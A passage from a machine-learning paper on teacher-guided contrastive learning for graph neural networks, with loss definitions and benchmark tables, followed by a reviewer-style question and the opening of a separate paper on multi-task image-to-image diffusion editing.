\[ h_v^{(l)} = \phi_U^{(l-1)} \left( h_v^{(l-1)}, \bigoplus_{u \in N_v} \psi_M^{(l-1)}(h_v^{(l-1)}, h_u^{(l-1)}, h_{vu}^{(l-1)}) \right), \]

where \( \phi_U^{(l-1)} \) and \( \psi_M^{(l-1)} \) are the update and the message function of the \( (l-1) \)-th layer, respectively, and \( \bigoplus \) is a permutation-invariant aggregation operator.

Global Representations for Graphs using Contrastive Learning.
Contrastive learning (CL) aims to learn meaningful representations by attracting positive pairs (i.e., similar instances, such as two different perturbations of the same graph) while repelling negative pairs (i.e., dissimilar instances, such as two different input graphs) in an unsupervised manner, as shown in Figure 2(b). Formally, let \( G_0 \) denote the original graph, \( G_p \) denote its perturbed version (i.e., a positive pair), and \( G_n \) be a different input graph (i.e., a negative sample). Then, the CL objective can be defined as follows:

\[ L_{CL} = - \log \frac{\text{sim}(f(G_0), f(G_p))}{\sum_{G_n} \text{sim}(f(G_0), f(G_n))}, \]

where \( f \) is a GNN and \( \text{sim}(\cdot, \cdot) \) is a similarity measure for embeddings. Minimization of Equation 2 brings positive pairs closer and pushes negative pairs further apart in the embedding space. However, unlike image augmentation schemes (e.g., scaling, rotation, color jitter), graph augmentation schemes (e.g., node/edge perturbations, subgraph sampling) may fail to preserve the graph semantics. For example, Figure 2(b) illustrates that removing one edge leads to two disconnected graphs, significantly changing the original semantics. Recently, D-SLA incorporates edit distances between graphs to train its model, partially addressing this issue (Kim et al., 2022).

3.2 Proposed Teacher-guided Contrastive Learning (TGCL) for Graphs

The fundamental motivation of our proposed TGCL framework is based on the following results. More formal statements can be found in Appendix B.

- Noise contrastive estimation is equivalent to solving a binary classification problem between the samples of data and noise (Gutmann & Hyvärinen, 2010) (Proposition B.1).
- In supervised learning, 'soft labels' in the form of knowledge distillation (KD) lead to better generalization by reducing the variance of the Bayes-distilled risk (Menon et al., 2021) (Propositions B.2 and B.3).

The first result indicates that the existing CL methods can be viewed as supervised classification losses where the network is trained on artificially generated "hard pseudo-labels" (Gutmann & Hyvärinen, 2010; Oord et al., 2018). For example, \( L_{CL} \) (in Eq. 2) can be viewed as labeling the similarity between positive pairs, \( \text{sim}(f(G_0), f(G_p)) \), as the positive class, while negative pairs are considered the negative class. Similarly, we can analyze the loss components of D-SLA (Kim et al., 2022): their graph discrimination loss considers the original and perturbed graphs as two different classes; their edit-distance-based loss uses the edit distance between the anchor and the perturbed graph as a "hard margin" to learn the representations; finally, their margin loss acts similarly to \( L_{CL} \) (Eq. 2), where the similarity between the anchor and the perturbed graph is labeled as 1, and the similarity between two arbitrary graphs is labeled as 0.

The second result demonstrates that we can achieve better generalization performance by 'softening' the labels of an existing CL method, as the Bayes-distilled risk has lower variance compared to its naive un-distilled counterpart (Menon et al., 2021). To this end, we introduce a softer notion of distance by proposing a distilled perception distance, \( D_{dp} \), for any two arbitrary graphs, computed by comparing their deep features from a teacher network pre-trained using 'hard' pseudo-labels.

**Distilled Perceptual Distance.** Let \( G_a \) and \( G_b \) be two arbitrary graphs.
Consider a representation learning model with \( L \) message-passing layers as the teacher. At each layer \( l \), we obtain the node embeddings \( \{h^{(l)}_v\}_{v \in V} \) for a graph \( G \) and apply a pooling operation (e.g., max-pool, avg-pool) to obtain a fixed-length vector, denoted as \( h^{(l)}_G \). We extract such fixed-length features from each layer and concatenate them, i.e., \( h_{G_a} = [\{h^{(l)}_{G_a}\}_{l=1}^{L}] \) and \( h_{G_b} = [\{h^{(l)}_{G_b}\}_{l=1}^{L}] \) for \( G_a \) and \( G_b \), respectively. The distilled perception distance (or distilled distance) \( D_{dp} \) is then defined as the \( L_2 \) distance between these concatenated features, as follows:

\[ D_{dp}(G_a, G_b) = ||h_{G_a} - h_{G_b}||_2 \]

Notably, our proposed distilled distance is similar to the well-known "perceptual distance" from the computer vision literature, which compares the high-level latent activations extracted from a pre-trained convolutional neural network (CNN) (e.g., VGG (Simonyan & Zisserman, 2014) or ResNet (He et al., 2016)) to incorporate semantic differences between two samples (Johnson et al., 2016).

3.3 Proposed Loss Functions

The concept of a teacher-guided loss with "softer" positive/negative pairs for training the student network can be introduced to any contrastive learning framework for graphs. To showcase the flexibility of our proposed TGCL framework, we present two versions of it, using the normalized temperature-scaled cross-entropy (NT-Xent) loss (Chen et al., 2020a; You et al., 2020) and D-SLA (Kim et al., 2022): (I) TGCL-NTXent and (II) TGCL-DSLA.

Figure 3: Block diagram of our proposed TGCL framework. We obtain the representations from a pre-trained teacher model and compute the distilled distance for each pair of inputs. These pairwise distances are employed to "soften" the loss functions used to train the student.

3.3.1 TGCL-NTXent: TGCL framework using the NT-Xent Loss

We modify the NT-Xent loss for our TGCL framework as follows:

\[ L_{TGCL\text{-}NTXent} = \sum_{G_{p_i}} - \log \frac{\exp(D_{dp}(G_0, G_{p_i}) \cdot f_s(G_0) \cdot f_s(G_{p_i})/\tau)}{\sum_{G_{n_j}} \exp(D_{dp}(G_0, G_{n_j}) \cdot f_s(G_0) \cdot f_s(G_{n_j})/\tau)} \]

where \( f_s \) is the student network and \( f_s(\cdot) \) denotes the representation it produces. \( G_0 \) is the anchor sample, \( G_{p_i} \) is the \( i \)-th perturbed sample, and \( G_{n_j} \) is the \( j \)-th negative sample for the anchor \( G_0 \). Here, we incorporate the distilled distance, \( D_{dp}(G_0, G_{p_i}) \), in both the numerator and the denominator. The intuition is to produce larger similarity for positive pairs (i.e., \( f_s(G_0) \cdot f_s(G_{p_i}) \)) when the teacher's perception of the distilled distance is small.

3.3.2 TGCL-DSLA: TGCL framework using D-SLA

Next, we demonstrate how to introduce the distilled perception distance to incorporate the concept of teacher-guided "soft pairs" into D-SLA.

(a) Teacher-guided Soft Discrimination: We first discriminate the perturbed graphs from the original anchor by introducing \( L_{T\text{-}soft} \), which consists of two terms: the first is a KD-based loss, \( L_{KD} \), while the second is a weighted graph discrimination loss, \( L_{wGD} \). We first obtain the distilled distances \( [D_{dp}(G_0, G_0), \{D_{dp}(G_0, G_{p_i})\}_i] \) between the anchor \( G_0 \) and itself, and between \( G_0 \) and each of its perturbed variations \( G_{p_i} \).
We obtain the similarities by taking reciprocals of the normalized distilled distances, followed by clipping to ensure numerical stability:

\[ s_0 = \text{clip}(D_{dp}(G_0, G_0)^{-1}) \quad \text{and} \quad s_i = \text{clip}(D_{dp}(G_0, G_{p_i})^{-1}) \quad \forall i \]

Next, we compute a probability distribution (soft labels) using the softmax activation with temperature \( \tau \), i.e., \( \text{softmax}(s_0, s_1, \cdots; T = \tau) \). Similarly, we obtain a score for each graph and compute a probability distribution using the temperature-scaled softmax: \( \text{softmax}(\Psi \circ f_s(G_{p_i}); T = \tau) \). Now, we obtain the distillation loss, \( L_{KD} \), by minimizing the cross-entropy between these probability distributions:

\[ L_{KD} := \tau^2 H\left(\text{softmax}(s_0, s_1, \cdots; \tau), \text{softmax}(\Psi \circ f_s(G_{p_i}); \tau)\right) \]

where \( H(y, \hat{y}) = \sum_y - y \log \hat{y} \) is the cross-entropy function and \( \Psi \circ f_s \) is the composition of the score function, \( \Psi \), and the student network, \( f_s \). Therefore, this loss incorporates the teacher's smoothened perception into the score functions used to learn the student's representations.

The second term, \( L_{wGD} \), is a set of binary cross-entropy functions where \( G_0 \) is labeled as 1 and the \( G_{p_i} \)'s are labeled as 0, with associated soft weights \( w_i \):

\[ L_{wGD} = \left[ H(1, \sigma(\Psi \circ f_s(G_0))) + \sum_i w_i H(0, \sigma(\Psi \circ f_s(G_{p_i}))) \right], \]

where \( w_i = \frac{D_{dp}(G_0, G_{p_i})}{\sum_j D_{dp}(G_0, G_{p_j})} \). Therefore, \( L_{wGD} \) incorporates the teacher's soft labels via \( w_i \). Now, \( L_{T\text{-}soft} \) combines both aforementioned loss components with a hyper-parameter \( \alpha \):

\[ L_{T\text{-}soft} = \alpha L_{KD} + (1 - \alpha)L_{wGD} \]

(b) Teacher-guided Perception Loss: Next, we introduce a perception loss, \( L_{T\text{-}percept} \). It ensures that the embedding-level difference between the original and perturbed graphs is proportional to the teacher's perspective of their corresponding distilled distances:

\[ L_{T\text{-}percept} = \sum_{i,j} \left( \frac{\text{dist}(f_s(G_{p_i}), f_s(G_0))}{D_{dp}(G_{p_i}, G_0)} - \frac{\text{dist}(f_s(G_{p_j}), f_s(G_0))}{D_{dp}(G_{p_j}, G_0)} \right)^2 \]

where \( \text{dist}(f_s(G_a), f_s(G_b)) \) denotes the \( L_2 \) distance between graphs \( G_a \) and \( G_b \) in the representation space.

(c) Teacher-guided Margin Loss for Negative Graphs: Our third component, \( L_{T\text{-}Margin} \), is a modified margin loss where the distilled distance acts as a regularizer, controlling the margin among
Table 1: Performance (mean ± std) comparison on the graph classification task.

| Methods | BBBP | ClinTox | MUV | HIV | BACE | SIDER | Tox21 | ToxCast | Avg |
|------------------|------|---------|-----|-----|------|-------|-------|---------|-----|
| No Pretrain | 65.8 ± 4.5 | 58.0 ± 4.4 | 71.8 ± 2.5 | 75.3 ± 1.9 | 70.1 ± 5.4 | 57.3 ± 1.6 | 74.0 ± 0.8 | 63.4 ± 0.6 | 66.96 |
| EdgePred (Hamilton et al., 2017) | 67.3 ± 2.4 | 64.1 ± 3.7 | 74.1 ± 2.1 | 76.3 ± 1.0 | 79.9 ± 0.9 | 60.4 ± 0.7 | 76.0 ± 0.6 | 64.1 ± 0.6 | 70.28 |
| AttrMasking (Hu et al., 2020) | 64.3 ± 2.8 | 71.8 ± 4.1 | 74.7 ± 1.4 | 77.2 ± 1.1 | 79.3 ± 1.6 | 61.0 ± 0.7 | 76.7 ± 0.4 | 64.2 ± 0.5 | 71.15 |
| ContextPred (Hu et al., 2020) | 68.0 ± 2.0 | 65.9 ± 3.8 | 75.8 ± 1.7 | 77.3 ± 1.0 | 79.6 ± 1.2 | 60.9 ± 0.6 | 75.7 ± 0.7 | 63.9 ± 0.6 | 70.89 |
| Infomax (Veličković et al., 2019) | 68.8 ± 0.8 | 69.9 ± 3.0 | 75.3 ± 2.5 | 76.0 ± 0.7 | 75.9 ± 1.6 | 58.4 ± 0.8 | 75.3 ± 0.5 | 62.7 ± 0.4 | 70.29 |
| GraphCL (You et al., 2020) | 69.7 ± 0.7 | 76.0 ± 2.7 | 69.8 ± 2.7 | 78.5 ± 1.2 | 75.4 ± 1.4 | 60.5 ± 0.9 | 73.9 ± 0.7 | 62.4 ± 0.6 | 70.78 |
| JOAO (You et al., 2021) | 70.2 ± 1.0 | 81.3 ± 2.5 | 71.7 ± 1.4 | 76.7 ± 1.1 | 77.3 ± 0.3 | 60.0 ± 0.8 | 75.0 ± 0.3 | 62.9 ± 0.5 | 71.89 |
| JOAOv2 (You et al., 2021) | 71.4 ± 0.8 | 83.7 ± 1.2 | 73.7 ± 1.2 | 77.1 ± 1.2 | 75.1 ± 1.3 | 60.2 ± 0.7 | 75.1 ± 0.6 | 63.0 ± 0.6 | 72.16 |
| GraphLoG (Xu et al., 2021) | 72.6 ± 0.8 | 76.7 ± 3.3 | 76.0 ± 1.1 | 77.8 ± 0.8 | 78.5 ± 1.2 | 61.2 ± 1.1 | 75.7 ± 0.5 | 63.5 ± 0.7 | 73.36 |
| BGRL (Thakoor et al., 2022) | 66.7 ± 4.7 | 64.7 ± 6.5 | 69.4 ± 2.7 | 75.5 ± 1.9 | 71.3 ± 5.5 | 60.4 ± 1.4 | 74.8 ± 0.7 | 63.2 ± 0.8 | 68.25 |
| SimGCL (Yu et al., 2022) | 67.4 ± 1.2 | 55.7 ± 4.7 | 71.2 ± 1.8 | 75.0 ± 0.9 | 74.1 ± 2.7 | 57.4 ± 1.7 | 74.4 ± 0.5 | 62.3 ± 0.4 | 67.19 |
| SimGRACE (Xia et al., 2022) | 71.3 ± 0.9 | 64.2 ± 4.5 | 71.2 ± 3.4 | 74.5 ± 1.1 | 73.8 ± 1.4 | 60.9 ± 0.9 | 74.2 ± 0.6 | 63.4 ± 0.5 | 69.13 |
| D-SLA (Kim et al., 2022) | 72.6 ± 0.8 | 80.2 ± 1.5 | 76.6 ± 0.9 | 78.6 ± 0.4 | 83.8 ± 1.0 | 60.2 ± 1.1 | 76.8 ± 0.5 | 64.2 ± 0.5 | 74.13 |
| Our TGCL-NTXent (w/ GraphLoG) | 74.9 ± 0.9 | 85.3 ± 2.2 | 78.9 ± 1.0 | 79.1 ± 0.5 | 83.7 ± 1.4 | 63.6 ± 0.6 | 76.7 ± 0.4 | 64.1 ± 0.4 | 75.79 |
| Our TGCL-NTXent (w/ D-SLA) | 74.0 ± 0.4 | 82.8 ± 2.2 | 77.0 ± 0.9 | 77.9 ± 0.3 | 84.3 ± 1.0 | 64.2 ± 0.3 | 76.6 ± 0.1 | 64.7 ± 0.4 | 75.19 |
| Our TGCL-DSLA (w/ GraphLoG) | 74.8 ± 0.3 | 80.6 ± 0.5 | 77.4 ± 0.1 | 78.6 ± 0.2 | 83.0 ± 1.1 | 61.4 ± 0.4 | 76.1 ± 0.1 | 64.0 ± 0.3 | 74.49 |
| Our TGCL-DSLA (w/ D-SLA) | 73.5 ± 0.9 | 84.9 ± 1.3 | 79.4 ± 0.9 | 78.8 ± 0.5 | 85.2 ± 0.4 | 61.2 ± 1.0 | 76.9 ± 0.1 | 64.9 ± 0.2 | 75.60 |

## 4 EXPERIMENTAL RESULTS

An effective representation of a graph should capture both the global structure and the local semantics.
Therefore, to gauge the efficacy of the proposed method in learning informative representations, we conduct two sets of experiments: (i) graph classification and (ii) link prediction. We provide additional details and ablation studies in our Appendix. Our anonymized code is available [here].

### 4.1 GRAPH CLASSIFICATION

**Datasets.** Following prior works (You et al., 2021; Xu et al., 2021; Kim et al., 2022), we utilize ZINC15 (Sterling & Irwin, 2015) to train the representation learning models. Next, we finetune the models on eight different molecular benchmarks from MoleculeNet (Wu et al., 2018). We divide the datasets based on the constituting molecules' scaffolds (molecular substructures) and evaluate the models' generalization ability on out-of-distribution test samples (Wu et al., 2018).

**State-of-the-art Baselines.** We compare the proposed method's performance against twelve existing methods: EdgePred (Hamilton et al., 2017), AttrMasking (Hu et al., 2020), ContextPred (Hu et al., 2020), Infomax (Veličković et al., 2019), GraphCL (You et al., 2020), JOAO (You et al., 2021), JOAOv2 (You et al., 2021), GraphLoG (Xu et al., 2021), BGRL (Thakoor et al., 2022), SimGCL (Yu et al., 2022), SimGRACE (Xia et al., 2022) and D-SLA (Kim et al., 2022).

**Evaluation Metric.** We compare the Area Under the Receiver Operating Characteristic curve (AUROC) for benchmarking (Davis & Goadrich, 2006). AUROC quantifies the overall discriminative power of the classifier across all possible classification thresholds. Its value ranges between 0 and 1, with higher values indicating better discrimination ability of the model (see the evaluation sketch at the end of this subsection).

**Results.** In Table 1, we can see that the "no pretraining" model achieves the lowest performance. While predictive pretraining improves upon the no-pretraining model, its performance remains worse than that of the CL models. This is because predictive methods primarily focus on the local structure, while molecular property classification requires the global structure. In contrast, CL methods focus on the global structure by contrasting original and perturbed graphs to achieve better performance. While a few augmentation-free CL methods (Yu et al., 2022; Xia et al., 2022) have been proposed, their performance remains significantly lower than the state of the art. GraphLoG achieves near state-of-the-art performance by exploring both global semantics and local substructures. However, D-SLA achieves state-of-the-art performance by exploring the local discrete properties of graphs.

For our proposed framework, we report results using GraphLoG and D-SLA as teacher modules for both the TGCL-NTXent and TGCL-DSLA models, demonstrating the generalizability of our framework. As we can see, the proposed method achieves a consistent performance boost irrespective of the training methodology of the teacher module. Furthermore, we observe that TGCL-NTXent (w/ GraphLoG) achieves the best performance, and TGCL-DSLA (w/ D-SLA) achieves comparable performance. In particular, we do not observe an additional advantage of using the more graph-specific D-SLA-based loss functions while learning global graph-level representations for molecular property prediction tasks.

In Figure 4, we visualize the learned latent spaces of GraphLoG, D-SLA, and our TGCL-DSLA (w/ D-SLA) using t-SNE (Van der Maaten & Hinton, 2008). We observe that both GraphLoG and TGCL-DSLA segregate the positive and negative samples more successfully than D-SLA.
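As referenced in the Evaluation Metric paragraph above, per-task AUROC averaging on these multi-task molecular benchmarks can be sketched as follows (scikit-learn's `roc_auc_score`; the missing-label convention of `-1` is our assumption, not necessarily the authors'):

```python
import numpy as np
from sklearn.metrics import roc_auc_score

def mean_auroc(y_true, y_score):
    # y_true: [n_mols, n_tasks] binary labels; y_score: predicted probabilities
    aucs = []
    for t in range(y_true.shape[1]):
        mask = y_true[:, t] >= 0            # assume -1 marks missing labels
        labels = y_true[mask, t]
        if labels.min() == labels.max():    # AUROC undefined for a single class
            continue
        aucs.append(roc_auc_score(labels, y_score[mask, t]))
    return float(np.mean(aucs))
```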
### 4.2 LINK PREDICTION

**Datasets.** We consider COLLAB, IMDB-Binary, and IMDB-Multi from the TU Benchmarks (Morris et al., 2020). We use the same data splits as in (Kim et al., 2022).

**State-of-the-art Baselines.** We compare the proposed method against various predictive methods (AttrMasking (Hu et al., 2020), ContextPred (Hu et al., 2020)), contrastive frameworks (Infomax (Veličković et al., 2019), GraphCL (You et al., 2020), JOAO (You et al., 2021), GraphLoG (Xu et al., 2021), BGRL (Thakoor et al., 2022), SimGCL (Yu et al., 2022), SimGRACE (Xia et al., 2022)), and a discriminative learning algorithm (D-SLA (Kim et al., 2022)).

**Evaluation Metric.** We compare average precision (as in (Kim et al., 2022)). It ranges from 0 to 1, with a higher value indicating better performance.

**Results.** Table 2 demonstrates that, unlike graph classification tasks, local context plays a crucial role in link prediction. Therefore, the predictive models typically outperform most of the CL methods. Among the existing CL methods, GraphLoG performs similarly to ContextPred as it focuses on both local and global structures. D-SLA achieves better performance by capturing local structures using edit-distance-based discriminations that standard CL models fail to distinguish. In comparison, our proposed distilled distance from the teacher network incorporates a regularized notion of both local and global semantics. The local semantics are encapsulated in the latent features of the initial layers, while the global semantics are contained within the high-level global features. Therefore, we can surpass existing local and global representation-learning-based models by visible margins for all three datasets. Interestingly, our TGCL-DSLA (w/ GraphLoG) performs

Figure 4: t-SNE visualization of the learned latent spaces: (a) GraphLoG, (b) D-SLA, (c) TGCL-DSLA.

**Table 2:** Performance (mean ± std) comparison on the link prediction task.

| Methods | COLLAB | IMDB-Binary | IMDB-Multi | Avg. |
|--------------------------|--------|-------------|------------|------|
| No Pretrain | 80.01 ± 1.14 | 65.72 ± 3.58 | 64.93 ± 1.92 | 71.22 |
| AttrMasking (Hu et al., 2020) | 81.43 ± 0.80 | 70.62 ± 3.68 | 63.37 ± 2.15 | 71.81 |
| ContextPred (Hu et al., 2020) | 83.96 ± 0.75 | 70.47 ± 2.24 | 66.09 ± 2.74 | 73.51 |
| Infomax (Veličković et al., 2019) | 80.83 ± 0.62 | 67.25 ± 1.87 | 64.98 ± 2.47 | 71.02 |
| GraphCL (You et al., 2020) | 76.04 ± 1.04 | 63.71 ± 2.98 | 62.40 ± 3.04 | 67.38 |
| JOAO (You et al., 2021) | 76.57 ± 1.54 | 65.37 ± 3.23 | 62.76 ± 1.52 | 68.23 |
| GraphLoG (Xu et al., 2021) | 82.95 ± 0.98 | 69.71 ± 3.18 | 64.88 ± 1.87 | 72.51 |
| BGRL (Thakoor et al., 2022) | 76.79 ± 1.13 | 67.97 ± 4.14 | 63.71 ± 2.09 | 69.49 |
| SimGCL (Yu et al., 2022) | 74.47 ± 1.54 | 64.11 ± 2.79 | 62.81 ± 2.32 | 68.72 |
| SimGRACE (Xia et al., 2022) | 74.51 ± 1.54 | 64.49 ± 2.79 | 62.81 ± 2.32 | 68.72 |
| D-SLA (Kim et al., 2022) | 86.21 ± 0.38 | 78.54 ± 2.79 | 69.45 ± 2.29 | 78.07 |
| TGCL-NTXent (w/ GraphLoG) | 87.23 ± 0.14 | 75.09 ± 1.88 | 67.11 ± 3.75 | 76.48 |
| TGCL-NTXent (w/ D-SLA) | 87.51 ± 1.24 | 77.95 ± 3.89 | 67.88 ± 2.20 | 77.78 |
| TGCL-DSLA (w/ GraphLoG) | **91.09 ± 0.33** | **83.15 ± 0.89** | **74.11 ± 1.44** | **82.78** |
| TGCL-DSLA (w/ D-SLA) | 87.51 ± 0.59 | 80.03 ± 4.13 | 70.97 ± 2.42 | 79.50 |

Table 3: Impact of the capacity of the student TGCL-DSLA models (mean ± std) for graph classification. "Full-capacity" denotes the 5-layered model (i.e., the same capacity as the teacher).
| Model | BBBP | ClinTox | MUV | HIV | BACE | SIDER | Tox21 | ToxCast | Avg |
|------------------------|------|---------|-------|-------|------|-------|-------|--------|-----|
| D-SLA (Kim et al., 2022) | 72.6 ± 0.8 | 80.2 ± 1.5 | 76.6 ± 0.9 | 78.6 ± 0.4 | 83.8 ± 1.0 | 60.2 ± 1.1 | 76.8 ± 0.5 | 64.2 ± 0.5 | 74.13 |
| w/ full-capacity Student | 73.5 ± 0.9 | 84.9 ± 1.3 | 79.4 ± 0.9 | 78.8 ± 0.5 | 85.2 ± 0.4 | 61.3 ± 1.0 | 76.9 ± 0.1 | 64.9 ± 0.2 | 75.60 |
| w/ 3-layer Student | 74.6 ± 0.4 | 84.6 ± 1.4 | 76.4 ± 1.0 | 77.9 ± 0.1 | 82.7 ± 1.1 | 61.0 ± 0.3 | 75.0 ± 0.1 | 63.6 ± 0.4 | 74.48 |
| w/ 2-layer Student | 72.6 ± 0.5 | 81.4 ± 0.4 | 77.3 ± 1.5 | 77.6 ± 0.2 | 80.6 ± 0.4 | 60.8 ± 0.4 | 74.7 ± 0.4 | 63.0 ± 0.1 | 73.50 |

better than TGCL-DSLA (w/ D-SLA), even though D-SLA outperformed GraphLoG. Therefore, a better teacher does not necessarily produce better distillation for the student, as previously observed and analyzed in supervised learning (Menon et al., 2021; Kaplun et al., 2022; Zong et al., 2023). We also observe that TGCL-NTXent produces poor performance compared to TGCL-DSLA, and often even compared to its teacher models. This is because the NT-Xent loss focuses only on contrasting the global representations, failing to capture the local graph characteristics. Therefore, even when a regularized notion of both local and global semantics is provided in terms of the distilled distance, the NT-Xent-based TGCL models fail to utilize it efficiently for the link prediction tasks. We can also validate this hypothesis by comparing the performance of GraphCL, which uses the NT-Xent loss, against the other methods (Table 2).

### 4.3 Experiments with Compressed Students

Table 3 demonstrates the performance of student TGCL-DSLA models on the downstream molecular property prediction task. We can see that, with the same capacity (i.e., 5 GNN layers) as the teacher module of D-SLA, our proposed student network consistently outperforms the teacher. As we decrease the capacity of our student network by reducing the number of layers, the overall performance drops. However, we observe that even with 3 GNN layers, our student module outperforms the teacher D-SLA model. These results demonstrate that our proposed TGCL framework can compress the student representation network by enabling smoothed knowledge transfer from a pre-trained teacher to the student representation learning model.

### 5 Conclusion & Discussion

We utilize knowledge distillation (KD) for graph representation learning, where a self-supervised pre-trained teacher model is used to guide the training of a student model to obtain more generalized representations. Extensive experimentation demonstrates the effectiveness of the proposed method in improving the performance of graph classification and link prediction tasks. However, there are still many open challenges in graph representation learning, such as the efficient handling of large-scale graphs, the ability to handle heterogeneity and multimodality, and the development of robust methods for noisy or incomplete data. Probing these challenges further and developing new graph representation learning techniques are in the scope of future research directions.

**Limitations.** The performance of a student network heavily depends on the teacher's quality. While a more accurate 'teacher' does not necessarily lead to better distillation, a 'bad' teacher can reduce the student's performance.
In particular, a better teacher yields a better approximation of the Bayes class probability distribution while leading to higher variance (i.e., unstable predictions) (Menon et al., 2021). Further, the teacher-student architecture is computationally expensive, as we first need to train the teacher, followed by the student.

**Broader Impact.** KD can significantly impact graph representations, with broader implications for various fields, including bioinformatics, drug discovery, social network analysis, recommendation systems, etc. A few potential impacts of our work are as follows: (a) It improves the efficiency and scalability of graph representation learning by enabling "soft" knowledge transfer from a pre-trained teacher model to a smaller, more efficient student network. (b) It improves the generalization performance of graph representation learning models by leveraging the 'dark knowledge' encoded in a pre-trained teacher model's representations. Overall, KD has the potential to significantly impact graph representations and, therefore, the various applications that rely on graphs and network analysis.

**Reproducibility Statement.** To ensure that the proposed work is reproducible, we have included an algorithm (see Algorithm 1 in the Appendix). We have clearly defined the loss functions in Section 3.3. The implementation details and hyperparameters are specified in Section D. The code of the proposed method is available at: https://anonymous.4open.science/r/TGCL-400E/. This is an anonymous link that does not reveal the authors' identities. We have also included ReadMe files (inside each folder) to conveniently reproduce our results.

**Ethics Statement.** The ideas and techniques proposed in this paper can be useful in several real-world applications, including the medical domain and e-commerce applications. We have touched on both the theoretical and experimental aspects of this problem in our work. We believe our results/findings should be available to all scientific communities for further research and development in this area, independent of their background (e.g., race, caste, creed, gender, nationality, etc.). The datasets used in our experiments are purely academic, and we do not think our work poses any specific ethical questions or creates potential biases against any particular group.

REFERENCES

Soroush Abbasi Koohpayegani, Ajinkya Tejankar, and Hamed Pirsiavash. Compress: Self-supervised learning by compressing representations. Advances in Neural Information Processing Systems, 33:12980–12992, 2020.

Nesreen K Ahmed, Jennifer Neville, Ryan A Rossi, and Nick Duffield. Efficient graphlet counting for large networks. In 2015 IEEE International Conference on Data Mining, pp. 1–10. IEEE, 2015.

Jinheon Baek, Dong Bok Lee, and Sung Ju Hwang. Learning to extrapolate knowledge: Transductive few-shot out-of-graph link prediction. Advances in Neural Information Processing Systems, 2020.

Prashant Bhat, Elahe Arani, and Bahram Zonooz. Distill on the go: Online knowledge distillation in self-supervised learning. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 2678–2687, 2021.

K.M. Borgwardt and H.P. Kriegel. Shortest-path kernels on graphs. In Fifth IEEE International Conference on Data Mining (ICDM'05), 2005.

Ting Chen, Simon Kornblith, Mohammad Norouzi, and Geoffrey Hinton. A simple framework for contrastive learning of visual representations. In International Conference on Machine Learning, pp. 1597–1607. PMLR, 2020a.
Ting Chen, Simon Kornblith, Kevin Swersky, Mohammad Norouzi, and Geoffrey E Hinton. Big self-supervised models are strong semi-supervised learners. Advances in neural information processing systems, 33:22243–22255, 2020b. Jesse Davis and Mark Goadrich. The relationship between precision-recall and roc curves. In Proceedings of the 23rd international conference on Machine learning, pp. 233–240, 2006. Wenqi Fan, Yao Ma, Qing Li, Yuan He, Eric Zhao, Jiliang Tang, and Dawei Yin. Graph neural networks for social recommendation. In The world wide web conference, pp. 417–426, 2019. Zhiyuan Fang, Jianfeng Wang, Lijuan Wang, Lei Zhang, Yezhou Yang, and Zicheng Liu. Seed: Self-supervised distillation for visual representation. arXiv preprint arXiv:2101.04731, 2021. Matthias Fey and Jan Eric Lenssen. Fast graph representation learning with pytorch geometric. arXiv preprint arXiv:1903.02428, 2019. Tommaso Furlanello, Zachary Lipton, Michael Tschannen, Laurent Itti, and Anima Anandkumar. Born again neural networks. In International Conference on Machine Learning, pp. 1607–1616. PMLR, 2018. Yuting Gao, Jia-Xin Zhuang, Shaohui Lin, Hao Cheng, Xing Sun, Ke Li, and Chunhua Shen. Disco: Remedying self-supervised learning on lightweight models with distilled contrastive learning. In European Conference on Computer Vision, pp. 237–253. Springer, 2022.
bFMpmb8p3D
Why did the authors start with the inverse of image restoration (motion blurring) instead of the image restoration task (deblurring)? Blurring an image seems very easy; a simple convolution with a blur kernel could achieve a similar blurring effect.
MULTI-TASK IMAGE-TO-IMAGE DIFFUSION MODELS WITH FINE-GRAINED CONTROL

Anonymous authors
Paper under double-blind review

ABSTRACT

Diffusion models have recently been applied to various image restoration and editing tasks, showing remarkable results in commercial products, e.g., Adobe Photoshop. While recent approaches to text-based editing have shown flexibility and great editing capacity, they still lack fine-grained control and/or multi-task compositing capabilities. In everyday applications, however, having a single tool for image editing with detailed user control across multiple tasks is highly preferred. This paper proposes a multi-task image-to-image diffusion model that allows fine-grained image editing among multiple tasks within a single model. Our approach builds upon conditional diffusion models and jointly models the input images and the input compositing effects, including motion blur, film grain, colorization, image sharpening, and inpainting. We present a novel input conditioning formulation and observe that using explicit binary task activation labels and cross-attention-based feature conditioning are key to allowing the model to achieve multi-task editing. In addition, we introduce a novel benchmark dataset for image compositing effects with standard image metrics for advancing the state of the art. Our approach can manipulate natural images with fine-grained, disentangled user control in single- and multi-task editing setups and generalizes well across different domains and even to unseen data distributions. We present experimental results on various compositing tasks to show that our approach outperforms existing techniques and baselines.

1 INTRODUCTION

Diffusion models have recently made significant progress in image generation (Ho et al., 2020; Dhariwal & Nichol, 2021), attracting large interest in generative AI. The famous stable diffusion approach by Rombach et al. (2022) generates impressive images based on text prompts, revolutionizing the entire art industry. Many commercial photo editors now integrate AI-based editing modules based on stable diffusion, such as Adobe Photoshop, Luminar Neo, Canva, and Lensa. Diffusion-based models have been applied to various image-to-image translation tasks, including image super-resolution (Saharia et al., 2022c), inpainting (Saharia et al., 2022a; Lugmayr et al., 2022), denoising (Kawar et al., 2022a; Zhu et al., 2023; Murata et al., 2023), deblurring (Whang et al., 2022; Ren et al., 2022), stroke-based editing (Meng et al., 2021), and text-based editing (Brooks et al., 2023; Parmar et al., 2023). Existing work on diffusion-based image editing focuses more on image restoration tasks, e.g., denoising and deblurring. The inverse tasks, e.g., motion blur and film grain synthesis, are yet to be explored.

Among the different types of approaches, text-based editing stands out as one of the hottest topics in diffusion-based image editing since it provides users direct control via intuitive text prompts (Brooks et al., 2023; Parmar et al., 2023; Tumanyan et al., 2023). Localized editing can be achieved by integrating masks (Avrahami et al., 2022) or feature injection (Hertz et al., 2022; Tumanyan et al., 2023). Nevertheless, fine-grained control is not ensured, as the text encoders are not trained with this intent but instead for general-purpose tasks. Besides, they are initialized from pretrained models, e.g., BERT (Devlin et al., 2018) and CLIP (Radford et al., 2021), which are frozen during training.
However, photo editing with fine-grained control is a primary need for end users. Another feature in great demand is multi-task editing, which allows for performing multiple tasks within a single model. For instance, in film post-production, artists need to incrementally add compositing effects, such as motion blur, film grain, and colorization, to the processed frames. Thus, a single model that performs multiple editing tasks simultaneously is highly desirable for efficiency and for preventing the accumulation of undesired artifacts. Unfortunately, multi-task training for image-to-image translation is relatively under-explored (Saharia et al., 2022a).

